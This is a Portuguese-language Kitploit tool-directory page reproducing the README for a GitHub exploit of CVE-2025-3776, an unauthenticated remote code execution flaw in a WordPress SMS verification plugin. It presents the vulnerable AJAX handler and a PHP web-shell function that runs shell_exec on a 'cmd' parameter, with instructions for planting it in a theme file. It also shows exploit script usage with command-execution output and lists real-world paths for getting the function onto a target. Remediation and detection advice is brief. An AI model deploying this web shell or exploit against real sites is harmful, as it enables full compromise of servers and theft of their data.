Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2025-3776
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-3776

CVE-2025-3776

O plugin WordPress Verification SMS with TargetSMS <= 1.5 é vulnerável a Execução Remota de Código (RCE)

Ver Repositório
711há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3776 - Execução Remota de Código no Plugin "Verification SMS with TargetSMS" <= 1.5

Informações do Plugin

  • Nome do Plugin: Verification SMS with TargetSMS
  • Versões Vulneráveis: <= 1.5
  • ID CVE: CVE-2025-3776
  • Tipo: Execução Remota de Código (RCE)
  • Classificação OWASP: A1: Injeção
  • Severidade CVSS: 10.0 (Crítica)
  • Privilégios Necessários: Não autenticado
  • Data de Publicação: 23 de abril de 2025

Causa Raiz: Erro de Programação

A vulnerabilidade origina-se do uso de call_user_func() em entrada controlada pelo usuário sem sanitização contra uma lista de permissões de funções permitidas. Isso cria uma falha lógica onde qualquer função PHP existente na memória pode ser executada sem autenticação, levando a uma condição severa de Execução Remota de Código (RCE).

Localização do Código Vulnerável

Arquivo:

/inc/ajax.php
root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

Esse código permite que usuários não autenticados acionem qualquer função existente na memória, incluindo funções maliciosas, caso o atacante consiga carregá-las.


Como Testar Esta Vulnerabilidade

✅ Pré-requisitos

Para explorar esta vulnerabilidade com sucesso, uma função chamável já deve existir no ambiente WordPress. Como plugins e temas do WordPress podem carregar funções automaticamente, o atacante pode injetar sua própria função por meio do arquivo functions.php do tema ativo.

📍 Arquivo a Modificar:

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ Injete o seguinte payload no final de functions.php:

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ Isso garante que a função evil() seja carregada na memória e se torne executável via call_user_func().


Passos de Exploração Usando o Script Python

✅ Uso:

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ Exemplo de Saída:

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Menu de Ajuda do Script Python:

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

Comportamento Sem Injeção

Se nenhuma função evil() ou similar estiver disponível na memória:

  • A requisição resultará em:
root@kitploit:~
{"status":false}
  • Isso significa que a função de callback não existe e a exploração falha com segurança.

Caminhos de Exploração no Mundo Real

  • Injeção em Arquivo do Tema: Modifique o functions.php do tema ativo (como demonstrado).
  • Via Plugins de Gerenciador de Arquivos: Use qualquer plugin como WP File Manager para enviar um arquivo PHP contendo evil().
  • Via LFI ou falhas de include: Use uma inclusão local de arquivo (LFI) existente para incluir um arquivo enviado que contenha uma função maliciosa.

Risco e Impacto

Uma vez que uma função maliciosa é carregada, um atacante não autenticado pode:

  • Executar comandos shell arbitrários
  • Visualizar arquivos sensíveis do servidor
  • Avançar para o comprometimento total do site ou do servidor

Recomendação

  • Desative ou remova imediatamente o plugin se estiver executando a versão <= 1.5
  • Restrinja o acesso à edição de arquivos via wp-admin
  • Corrija ou substitua o plugin por alternativas seguras

Detecção

Procure por requisições POST repetidas para:

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

Com callback=evil ou qualquer nome de função inesperado


Aviso Legal

Esta informação é fornecida apenas para fins educacionais e de pesquisa ética. O autor não é responsável por qualquer uso indevido ou dano causado pelo uso desta informação.


Atribuição do Exploit

Exploit por: Nxploited (Khaled Alenazi)

Baixar ferramenta